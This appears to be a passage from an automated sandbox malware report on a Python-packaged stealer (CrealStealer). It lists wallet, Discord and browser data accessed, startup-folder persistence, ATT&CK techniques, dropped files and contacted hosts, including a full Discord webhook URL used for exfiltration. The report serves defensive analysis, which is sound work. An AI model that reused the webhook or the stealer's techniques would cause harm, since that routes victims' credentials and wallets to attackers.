            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\DiscordJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\DiscordCanaryJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\DiscordPTBJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\DiscordDevelopmentJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\DiscordJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\DiscordCanaryJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\DiscordPTBJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile opened: C:\Users\user\AppData\Local\DiscordDevelopmentJump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2012652158.000001F3E3C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1959532011.000001F3E36D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1958967533.000001F3E36A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1958731140.000001F3E3403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1959293524.000001F3E36B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1958528378.000001F3E363E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1783368757.000002539B404000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: HyZh4pn0RF.exe PID: 4040, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB796B74 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,10_2_00007FFBBB796B74
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB794EC0 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyTuple_Type,sqlite3_bind_parameter_name,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,_Py_Dealloc,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyTuple_Pack,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyUnicode_FromString,PyDict_Type,PyDict_GetItemWithError,_Py_Dealloc,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PyExc_DeprecationWarning,PyErr_WarnFormat,PyList_GetItem,PyObject_CallOneArg,PyErr_Occurred,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PySequence_Check,PyTuple_Type,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PySequence_Size,PyErr_Format,PyObject_GetItem,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,10_2_00007FFBBB794EC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7950DD PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,PyTuple_Pack,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,10_2_00007FFBBB7950DD
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7F2A8C bind,WSAGetLastError,_Py_NoneStruct,PyExc_ValueError,PyErr_SetString,10_2_00007FFBBB7F2A8C
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            12
            Registry Run Keys / Startup Folder
            11
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Email Collection
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            1
            DLL Side-Loading
            12
            Registry Run Keys / Startup Folder
            1
            Virtualization/Sandbox Evasion
            LSASS Memory31
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            11
            Process Injection
            Security Account Manager1
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares2
            Data from Local System
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture15
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Timestomp
            Cached Domain Credentials2
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSync24
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520701 Sample: HyZh4pn0RF.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 52 geolocation-db.com 2->52 54 discord.com 2->54 56 2 other IPs or domains 2->56 70 Found malware configuration 2->70 72 Antivirus / Scanner detection for submitted sample 2->72 74 Multi AV Scanner detection for submitted file 2->74 78 3 other signatures 2->78 9 HyZh4pn0RF.exe 85 2->9         started        13 HyZh4pn0RF.exe 85 2->13         started        signatures3 76 Tries to detect the country of the analysis system (by using the IP) 52->76 process4 file5 36 C:\Users\user\AppData\Local\...\win32api.pyd, PE32+ 9->36 dropped 38 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 9->38 dropped 40 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 9->40 dropped 48 67 other files (none is malicious) 9->48 dropped 80 Drops PE files to the startup folder 9->80 15 HyZh4pn0RF.exe 7 9->15         started        42 C:\Users\user\AppData\Local\...\win32api.pyd, PE32+ 13->42 dropped 44 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 13->44 dropped 46 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 13->46 dropped 50 67 other files (none is malicious) 13->50 dropped 20 HyZh4pn0RF.exe 4 13->20         started        signatures6 process7 dnsIp8 58 geolocation-db.com 159.89.102.253, 443, 49708, 49713 DIGITALOCEAN-ASNUS United States 15->58 60 discord.com 162.159.136.232, 443, 49709, 49710 CLOUDFLARENETUS United States 15->60 62 2 other IPs or domains 15->62 34 C:\Users\user\AppData\...\HyZh4pn0RF.exe, PE32+ 15->34 dropped 64 Tries to steal communication platform credentials (via file / registry access) 15->64 66 Tries to steal Crypto Currency Wallets 15->66 22 cmd.exe 1 15->22         started        68 Tries to harvest and steal browser information (history, passwords, etc) 20->68 24 cmd.exe 1 20->24         started        file9 signatures10 process11 process12 26 conhost.exe 22->26         started        28 tasklist.exe 1 22->28         started        30 conhost.exe 24->30         started        32 tasklist.exe 1 24->32         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            HyZh4pn0RF.exe50%ReversingLabsWin64.Trojan.CrealStealer
            HyZh4pn0RF.exe100%AviraTR/PSW.Agent.mpcdf
            HyZh4pn0RF.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD4.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD5.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA1.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA224.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA256.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA384.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA512.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_keccak.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_poly1305.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Math\_modexp.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_x25519.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_strxor.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_asyncio.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_cffi_backend.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_multiprocessing.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_overlapped.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_queue.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_sqlite3.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_ssl.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_uuid.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\_wmi.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md__mypyc.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\libcrypto-3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\libffi-8.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\libssl-3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\pyexpat.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\python312.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32\pywintypes312.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\select.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI3442\win32\win32api.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            discord.com
            162.159.136.232
            truetrue
              unknown
              api.ipify.org
              172.67.74.152
              truefalse
                unknown
                geolocation-db.com
                159.89.102.253
                truetrue
                  unknown
                  api.gofile.io
                  45.112.123.126
                  truefalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0Rtrue
                      unknown
                      https://api.ipify.org/false
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://discord.gift/HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesHyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmpfalse
                          unknown
                          https://coinbase.com)HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpfalse
                            unknown
                            https://discord.com)zHyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://tiktok.com)HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                unknown
                                https://ebay.com)z$HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://docs.python.org/library/unittest.htmlHyZh4pn0RF.exe, 00000002.00000002.1822533941.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805597702.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498180126.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500555282.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787795082.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789691864.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1795287489.000002539A7F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://discord.com)HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      unknown
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#HyZh4pn0RF.exe, 00000002.00000002.1818704993.00000253983FF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1816780599.00000253983FF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813931845.00000253983FE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789605156.00000253983F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://packaging.python.org/en/latest/specifications/core-metadata/HyZh4pn0RF.exe, 00000002.00000002.1823958561.000002539ACF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          unknown
                                          https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64HyZh4pn0RF.exe, 00000002.00000003.1491805697.000002539A3D5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793303262.000002539A3DD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788862603.000002539A3A4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1493432472.000002539A3D0000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1494266364.000002539A336000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1494465434.000002539A392000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790103376.000002539A3AD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791704398.000002539A3BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://paypal.com)HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              unknown
                                              https://github.com/pypa/packagingHyZh4pn0RF.exe, 00000002.00000002.1823609373.000002539AAF0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1493090352.000002539A661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://refspecs.linuxfoundation.org/elf/gabi4HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1823609373.000002539AAF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://discord.com/api/v9/users/HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://xbox.com)HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://youtube.com)HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://twitch.com)zHyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://t.me/CrealStealerHyZh4pn0RF.exe, 00000002.00000003.1784174727.000002539B471000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://tools.ietf.org/html/rfc3610HyZh4pn0RF.exe, 00000002.00000003.1807654238.000002539A382000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790955383.000002539A34C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793434238.000002539A5FB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788652033.000002539B2FE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811309519.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811817866.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1821619779.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825189021.000002539B2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805946201.000002539A5FC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809054810.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790429949.000002539A2FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788652033.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807578063.000002539A35A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://github.com/platformdirs/platformdirsHyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://crl.dhimyotis.com/certignarootca.crlHyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785442131.000002539B4DE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784708486.000002539B4D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813019488.000002539B329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://curl.haxx.se/rfc/cookie_spec.htmlHyZh4pn0RF.exe, 00000002.00000002.1824793076.000002539B273000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826914311.000002539BBA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyHyZh4pn0RF.exe, 00000002.00000002.1823330103.000002539A999000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788973339.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807987225.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808509453.000002539A997000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
